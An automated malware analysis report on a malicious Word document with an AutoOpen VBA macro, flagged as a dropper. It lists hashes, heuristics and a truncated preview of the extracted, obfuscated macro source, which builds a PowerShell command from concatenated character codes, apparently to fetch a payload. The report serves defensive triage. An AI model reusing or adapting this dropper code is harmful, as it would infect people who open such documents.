Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5b3608494e90c680…

MALICIOUS

Office (OLE)

212.5 KB Created: 2018-06-26 07:45:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 6c127e044ca2da053ea6ff8a163d0ffc SHA-1: 89bd5cd7aea44e9c541989e52e8cd96ea1a86995 SHA-256: 5b3608494e90c680fbb1c82ca2d97ee6b92f0c35faed96d13a550f709c53a6b5
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function and concatenates strings to form a command, which is then likely executed. This behavior is indicative of a downloader or dropper, aiming to fetch and execute a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6591930-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6591930-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10833 bytes
SHA-256: 158be2ca43a121d6c08ea838789cabb9a494444cb7782ba95ce4480323c4a715
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "mZYaooO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MvdIlcBpbQ"
Function sIzKrlPS()
On Error Resume Next
whWswU = 78805
DcliMK = CDate(77717)
lhBtl = Sin(66418)
Fjzwmr = 33046
SBGlK = 16023
EaLoS = BiDbwV
imRtHWu = "He" + "ll" + "  " + "[StrINg]" + "::JOiN" + Chr(40) + "'', " + Chr(40) + Chr(40) + " 1" + "10, 24 " + ", " + "40 , 30 " + ",119 ,36" + ", 47 , " + "61 ,10"
MqEldj = 29982
hphWa = CDate(31394)
hFnVV = Sin(51458)
AbvjQA = 71790
ZEkfY = 95208
oMvBY = MBbXzt
MzzDKzzzILS = "3 ," + " 37, 40 " + ",32" + ", 47 ,41" + ", 62," + "106 "
HoKvJn = 73901
NAhmj = CDate(39514)
UGYVq = Sin(96769)
XuwCW = 25696
UVkdX = 91769
FFilG = QLkXs
MRKcIXKLWj = ",4 ,4" + "7 ," + " 62 " + ",10" + "0 , " + "29,47 ," + "40, " + "9, 38" + ",3" + "5 , 47" + " , "
Qdzwi = 22154
CrzcWG = CDate(77208)
RBDoB = Sin(2293)
VCqob = 20095
sJnOht = 68097
lEhXO = PZHDLY
SNXBYPv = "36, 6" + "2," + "113 ,11" + "0 , " + "34, 1" + "9 ,48,11" + "9 ,109" + ", 34 ,62" + " , 62" + ", 5" + "8 , 112" + " , "
iaLiIG = 81592
sRAAO = CDate(79068)
wCAaTm = Sin(98847)
WdSbX = 30816
XWoKHw = 32528
QocIQC = jnRIIF
obQVDo = "101 , 10" + "1,46,4" + "3 " + ", " + "36,3" + "5,5" + "7, 43 ,5" + "7 ," + " 4" + "7 ," + " 38 , 38" + " , 47 ,5"
zfniD = 77645
BbhbDd = CDate(41447)
osMoGE = Sin(2924)
sHvCQR = 61638
IhmMY = 94175
zwuRLR = poiaGq
TfjqLRwlmA = "6, 5" + "7 " + ",100, 41" + " ,37 ,3" + "9 ," + "101,12"
sIzKrlPS = imRtHWu + MzzDKzzzILS + MRKcIXKLWj + SNXBYPv + obQVDo + TfjqLRwlmA
HwqpwB = 34478
KjmfjI = CDate(1936)
ronbhz = Sin(22355)
VsOlUu = 33948
kKGBk = 72690
ruFrzO = ASCAlN
End Function
Function ODKifkkJ()
On Error Resume Next
kNqNji = 93869
utbJJ = CDate(9610)
HEDuI = Sin(84432)
UzGJNr = 72247
MKfUY = 20934
joVCq = iUdZb
NFWBsCGXTi = "4, " + "58,15,3" + "4, " + "24, 16 ," + "61, 6" + "0,101 ,1" + "0 , 34 ," + "62 " + ",62, 58"
SBHjn = 32003
OYXPEV = CDate(28736)
ECjDUc = Sin(50224)
PmsPBr = 35478
XQafS = 42039
hVpVl = SZiHLE
lWLjaiIvYz = ",1" + "12, 1" + "01" + ", 101, 6" + "1 ," + "61, 61," + "100, 123"
wEBiC = 52296
muSfG = CDate(79152)
zpndd = Sin(52149)
vGluX = 48272
bHjazh = 22447
ORaKuc = TuJnU
qTDsGRvqTl = " ,11" + "4, 12" + "2 ,4" + "6 , 43" + " ," + " 51 " + ",5" + "7 ,6" + "2," + "37 " + ", "
cPGHOG = CDate(481)
UahVPU = LpPXD
SAUuk = Sin(62055)
WEVKr = 1375
dFRAn = 86217
UpISa = 43295
jjdHf = "34 , 43," + "58" + " ,58" + " , 51,10" + "0, 41, 3" + "7 , 39" + " , 101 " + ",40 ,124" + " ,13,9,5" + "0,6 , 37" + " ,"
lzvEz = CDate(93919)
HImkWf = PutSA
KXpTt = Sin(32243)
VVnXh = 89356
ECHDhi = 48290
PCduHt = 70972
tNYZUwPupH = " 4" + "0 " + ", 5" + "7," + " 101" + " , 10 ,3" + "4 ,62, " + "62" + " ,5" + "8, 112," + " 1" + "01,1"
projJ = CDate(92938)
jAnkU = fsccu
oHGIc = Sin(2851)
EWDwH = 88154
NVnzQj = 64088
kpbcz = 85015
MmTac = "01,50 " + ", 36" + ",103" + " ,103" + ",51 , " + "51 ,41 " + ",103, " + "32,33, 1" + "26 , 40" + ",63"
RPFabK = CDate(74290)
qRosWb = fEYqrw
jIAuHk = Sin(96238)
XlUAs = 77000
FFTcC = 69909
fOSwz = 99776
SkWTTvbRQSp = " , 35 ," + " 4" + "8,1" + "27,1" + "22" + " ,56 ," + "100," + "41" + ",37" + ", 39, 10" + "1 "
LNmovV = CDate(61605)
bJwXLC = uZbSw
hzHzPJ = Sin(46396)
YvkLSh = 37902
qRzsh = 39136
uSMEs = 96419
GiTlUjvdiFf = ",29," + " 35,6" + "0 ," + "125,1" + "23 ,24 ," + "27 ,101 " + ",10" + ",34,6" + "2 , 62 ," + " 5" + "8 ,1"
Qqtbu = CDate(39705)
AAthrj = SEtNb
CFhzKh = Sin(95036)
UhmzK = 47036
JNqsuh = 76458
ftYjOT = 6861
JjDFtrbcCGA = "12 , 101" + " ,101 " + ",57 ,5" + "1, 32," + "35,36" + " ," + "45," + " 47" + ",56" + ", " + "39," + "47,35, "
VmqlHY = CDate(43720)
kIpuGc = SXjbP
KoPKwM = Sin(95434)
LNRlXS = 42316
BHEfoj = 7287
QwEKJ = 42582
YouzLPjp = "100 " + ", " + "50 ,51, " + "48" + ", 101 , " + "27,"
RddikC = CDate(86211)
NhjUM = kzGhIi
YfhXv = Sin
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.